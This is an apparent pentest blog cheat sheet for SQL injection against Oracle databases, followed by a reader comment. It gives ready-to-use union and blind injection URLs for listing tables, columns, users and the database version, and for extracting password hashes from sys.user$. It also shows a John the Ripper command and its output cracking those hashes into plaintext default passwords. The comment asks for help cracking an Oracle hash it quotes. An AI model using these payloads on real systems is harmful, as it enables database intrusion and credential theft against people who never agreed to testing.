1. Finding table names
select table_name from+user_tables
Example:-
http://192.168.2.199/ora.php?id=101+union+all+select+
table_name+from+user_tables
Blind Injection:http://192.168.2.199/ora.php?id=101 and
ascii(substr((select+table_name+from+user_tables
where rownum=1),1,1))>100
———————————————–
2. Iterating through the different rows:
Unfortunately it is not as straight forward, there is no LIMIT command in oracle.
Syntax:-select column_1, column_2 from (select rownum r_, column_1,
column_2 from table_1, table_2 where field_3 =
'some value')where r_ =2
EXAMPLE:-
http://192.168.2.199/ora.php?id=101+UNION+ALL+SELECT+TABLE_NAME
+FROM+(SELECT+ROWNUM+R,+TABLE_NAME+FROM
+USER_TABLES)+WHERE+R=1
————————————————————————–
3. Finding column names:
select+column_name+from+user_tab_columns
————————————————————————–
4. Finding Version:
Select banner from v$version
———————————————————————–
5. Finding Database user names:-
http://192.168.2.199/ora.php?id=101+union+
all+select+username,null+from+all_users
———————————————————————
6. Finding password hashes (the user in connection string should be a dba):
select name,astatus, password from sys.user$ where astatus =0;
<# a status =0 indicates only the users who are not locked)
example:-http://192.168.2.199/ora.php?id=101+union
+all+select+name||'–'||password+from+sys.user$
In the above example: i had only one column to select a string from database, so i had concatenated the
username and password field together separated with '–'.
—————————————————————————-
7. Cracking passwords using john the ripper:-
thanks to pentestmonkey for this
$ ./john –rules –wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt–format=oracle ~/opass
Loaded 14 password hashes with 14 different salts (Oracle [oracle])DIP (DIP)ORACLE (FLOWS_020100)ORACLE (FLOWS_FILES)ORACLE (XDB)ORACLE (CTXSYS)PASSWORD (HR)PASSWORD (SYSTEM)PASSWORD (SYS)TEST (TEST2)TEST1 (TEST1)
——————————————————————————
what else you want from a SQL Injection 
SQL Injection In Ingres
SQL Injection In DB2
3:19 pm on January 15th, 2008
Hello everyone!
If found this very usefull site, and thanks all the guys that took part of it.
I’m trying to patch john (1.7.2) in order to crack oracle passord .. but i meet a lot of problems.
I saw this line :”$ ./john –rules –wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt–format=oracle ~/opass” and have 2 questions :
- What does the opass file look like ?
- Which version of john has been patched
I saw in the openwall site that the 1.7.2 version could handle the oracle format … but with grep i found nothing about ora / oracle … and i cannot use the -format=oracle since i’ve got the following message :
Unknown ciphertext format name requested
Moreover, i tried to crack a file which contains Oracle hash like following :
DBSNMP:E066D214D5421CCC
But it doesn’t work
Can anyone help please ?